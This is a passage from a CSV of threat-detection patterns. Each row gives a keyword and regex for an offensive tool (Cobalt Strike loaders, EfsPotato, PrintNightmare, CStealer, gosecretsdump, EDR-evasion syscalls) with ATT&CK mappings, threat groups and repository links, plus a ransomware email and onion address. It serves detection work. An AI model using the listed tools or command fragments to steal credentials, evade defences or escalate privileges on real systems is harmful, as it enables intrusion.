T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - 
BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","39149" "*CS-BOFs/lsass*",".{0,1000}CS\-BOFs\/lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","39150" "*csc.exe /t:exe /out:RandomName.exe 
Program.cs*",".{0,1000}csc\.exe\s\/t\:exe\s\/out\:RandomName\.exe\sProgram\.cs.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","39151" "*csc.exe EfsPotato.cs *",".{0,1000}csc\.exe\sEfsPotato\.cs\s.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privilege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","39152" "*CSC_DEV_FCB_XXX_CONTROL_FILE*0x001401a3*",".{0,1000}CSC_DEV_FCB_XXX_CONTROL_FILE.{0,1000}0x001401a3.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","39153" "*CScrandle_fileless.cs*",".{0,1000}CScrandle_fileless\.cs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","39154" "*cscript *wmi.vbs -h*",".{0,1000}cscript\s.{0,1000}wmi\.vbs\s\-h.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","39155" "*cscript ..\\temp.vbs*",".{0,1000}cscript\s\.\.\\\\temp\.vbs.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","39156" "*cscript dl.vbs *http*/*.zip*.zip*",".{0,1000}cscript\sdl\.vbs\s.{0,1000}http.{0,1000}\/.{0,1000}\.zip.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","39157" "*CsEnox/SeManageVolumeExploit*",".{0,1000}CsEnox\/SeManageVolumeExploit.{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","N/A","10","2","110","17","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z","39158" "*csexec/csexec_history*",".{0,1000}csexec\/csexec_history.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","39159" "*csharp_inject_bof_inject*",".{0,1000}csharp_inject_bof_inject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - 
T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","39160" "*CSharpNamedPipeLoader*",".{0,1000}CSharpNamedPipeLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","39161" "*csload.net/*/muma.*",".{0,1000}csload\.net\/.{0,1000}\/muma\..{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon 
Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","N/A","10","10","122","15","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z","39162" "*csOnvps*teamserver*",".{0,1000}csOnvps.{0,1000}teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker 
- Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","39163" "*cSploit-*.apk*",".{0,1000}cSploit\-.{0,1000}\.apk.{0,1000}","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Framework","https://github.com/cSploit/android","1","1","N/A","N/A","N/A","10","3437","1117","2024-04-27T22:17:26Z","2014-10-04T05:53:29Z","39164" "*cSploit/android*",".{0,1000}cSploit\/android.{0,1000}","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Framework","https://github.com/cSploit/android","1","1","N/A","N/A","N/A","10","3437","1117","2024-04-27T22:17:26Z","2014-10-04T05:53:29Z","39165" "*csprecon -*",".{0,1000}csprecon\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","39166" "*CS-Remote-OPs-BOF*",".{0,1000}CS\-Remote\-OPs\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","39167" "*csrf_to_beef*",".{0,1000}csrf_to_beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","39168" "*CSSG_load.cna*",".{0,1000}CSSG_load\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","39169" "*CStealer Builder ~ 
*",".{0,1000}CStealer\sBuilder\s\~\s.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","N/A","10","","N/A","","","","39170" "*CStealer_assets\*",".{0,1000}CStealer_assets\\.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","N/A","10","","N/A","","","","39171" "*C-Sto/gosecretsdump*",".{0,1000}C\-Sto\/gosecretsdump.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","39172" "*C-Sto/goWMIExec*",".{0,1000}C\-Sto\/goWMIExec.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","39173" "*cs-token-vault.git*",".{0,1000}cs\-token\-vault\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","39174" "*CT_Indirect_Syscalls.c*",".{0,1000}CT_Indirect_Syscalls\.c.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. 
This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","39180" "*CT_Indirect_Syscalls.exe*",".{0,1000}CT_Indirect_Syscalls\.exe.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","39181" "*CT_Indirect_Syscalls.sln*",".{0,1000}CT_Indirect_Syscalls\.sln.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","39182" "*CT_Indirect_Syscalls.vcxproj*",".{0,1000}CT_Indirect_Syscalls\.vcxproj.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. 
This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","39183" "*cuba_support@exploit.im*",".{0,1000}cuba_support\@exploit\.im.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","39184" "*cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion*",".{0,1000}cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","39185" "*cube0x0/CVE-2021-1675*",".{0,1000}cube0x0\/CVE\-2021\-1675.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","39186" "*cube0x0/LdapSignCheck*",".{0,1000}cube0x0\/LdapSignCheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
